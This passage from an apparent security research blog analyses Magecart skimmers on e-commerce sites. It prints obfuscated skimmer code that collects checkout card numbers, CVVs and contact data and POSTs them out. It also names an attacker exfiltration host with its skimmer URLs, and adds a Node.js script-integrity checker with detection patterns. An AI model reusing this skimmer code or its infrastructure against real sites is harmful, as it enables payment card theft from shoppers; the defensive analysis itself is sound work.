        a= {Address:jQuery(_$_a5d5[19])[_$_a5d5[18]]()+ _$_a5d5[20]+ jQuery(_$_a5d5[21])[_$_a5d5[18]](),CCname:jQuery(_$_a5d5[22])[_$_a5d5[18]]()+ _$_a5d5[20]+ jQuery(_$_a5d5[23])[_$_a5d5[18]](),Email:jQuery(_$_a5d5[24])[_$_a5d5[18]](),Phone:jQuery(_$_a5d5[25])[_$_a5d5[18]](),Sity:jQuery(_$_a5d5[26])[_$_a5d5[18]](),State:jQuery(_$_a5d5[27])[_$_a5d5[18]](),Country:jQuery(_$_a5d5[28])[_$_a5d5[18]](),Zip:jQuery(_$_a5d5[29])[_$_a5d5[18]](),Shop:window[_$_a5d5[12]][_$_a5d5[30]],CcNumber:jQuery(document[_$_a5d5[0]])[_$_a5d5[18]](),ExpDate:jQuery(document[_$_a5d5[2]])[_$_a5d5[18]]()+ _$_a5d5[31]+ jQuery(document[_$_a5d5[4]])[_$_a5d5[18]](),Cvv:jQuery(document[_$_a5d5[6]])[_$_a5d5[18]]()};var b=JSON[_$_a5d5[32]](a);//59
        encData= d(b);jQuery[_$_a5d5[36]]({url:_$_a5d5[33],data:{main:encData},type:_$_a5d5[34],dataType:_$_a5d5[35],success:function(a)
        {
            return false
        }
        ,error:function(b,c,a)
        {
            return false
        }
        })
    }

Stage 3: Script exfiltrates credit card information

When placing an order, the compromised first-party checkout script is called and executes the skimmer. The malicious POST request was traced back to a first-party script that the attacker had modified by appending the skimming code at the bottom of the script.
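A modification like this one leaves the original script intact and only adds a tail, so a baseline comparison of the served checkout script catches it. The following is an added example, not PerimeterX or Magento code: a Node.js integrity check that locates the first changed line, isolates the appended tail and notes which traits of the two skimmers on this page it carries; the baseline and served samples are constructed stand-ins (the tail only mimics the shape of the skimmer).

```javascript
// Added example (not PerimeterX code and not Magento's): a first-party script
// integrity check of the kind that would have caught the PEXSuperstore change,
// where skimming code was appended below an otherwise untouched checkout
// script. Assumes Node.js; the baseline and served samples are constructed
// stand-ins (the tail only mimics the shape of the page's skimmer).

// Known-good copy of the checkout script, as deployed (constructed: the first
// lines of the Magento Checkout prototype shown on the page).
const BASELINE_JS = [
  'var Checkout = Class.create();',
  'Checkout.prototype = {',
  '    initialize: function(accordion, urls){',
  '        this.accordion = accordion;',
  '        this.progressUrl = urls.progress;',
  '    },',
  '};',
].join('\n');

// What the server returns now (constructed): the baseline plus an appended
// tail with a string table, a delayed start and a 3-second poll.
const SERVED_JS = BASELINE_JS + '\n' + [
  "var _$_tbl=(function(i,k){return i.split('%')})('a%b',1);",
  'setTimeout(function(){document[_$_tbl[0]]=_$_tbl[1];',
  'setInterval(function(){},3000)},0);',
].join('\n');

// Traits shared by the two skimmers on the page. None is proof on its own;
// each one found in code that was not in the baseline raises the severity.
const TRAITS = {
  delayedStart: /\bsetTimeout\s*\(/,
  polling: /\bsetInterval\s*\(/,
  stringTable: /\b_\$_[A-Za-z0-9]+\s*=/,           // "_$_a5d5"-style lookup tables
  computedDomProps: /document\[[^=\n]+\]\s*=(?!=)/, // document[x] = y assignments
  charDecoder: /String\.fromCharCode\(/,            // hand-rolled string decoding
};

// Compare the served file with the baseline line by line. Returns whether it
// changed, the first differing line (1-based, like the post's "first 960
// rows"), the appended tail when the baseline is an intact prefix, and the
// traits found in the changed code.
function checkScriptIntegrity(baseline, served) {
  const result = { unchanged: baseline === served, firstChangedLine: null, appended: null, traits: [] };
  if (result.unchanged) return result;
  const base = baseline.split('\n');
  const now = served.split('\n');
  let i = 0;
  while (i < base.length && i < now.length && base[i] === now[i]) i++;
  result.firstChangedLine = i + 1;
  if (i === base.length) result.appended = now.slice(i).join('\n');
  // If the change is inside the original code rather than appended, scan it all.
  const changed = result.appended !== null ? result.appended : served;
  for (const [name, re] of Object.entries(TRAITS)) if (re.test(changed)) result.traits.push(name);
  return result;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(checkScriptIntegrity(BASELINE_JS, SERVED_JS));
}
```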

Figures 1 and 2: Script exfiltrates credit card information

It was interesting to find out that https://assetstorage.net/ is related to a much larger campaign primarily targeting UmbroBrasil, a Brazilian website that was recently breached for the second time, and other lesser-known websites.

It is also worth mentioning that assetstorage.net hosts skimmers in addition to operating as an exfiltration gateway. Here are some of the skimmers it hosts:

  • https://assetstorage.net/src/upscalestripper.js
  • https://assetstorage.net/src/galeriedebeaute.js
  • https://assetstorage.net/src/deliveryathome.js

Skimmers hosted on assetstorage.net appear to be named after the intended target websites. We did not find any traces of active infection on upscalestripper and galeriedebeaute, but it is safe to assume that the attackers are preparing for a future campaign.

Conclusion

This revelation of multiple simultaneous Magecart attacks shows that digital skimming is rapidly becoming a major threat to global e-commerce businesses. To restore user confidence, website owners should monitor and track the behavior of first- and third-party code on their sites in real time to ensure bad actors do not bypass their infrastructure.
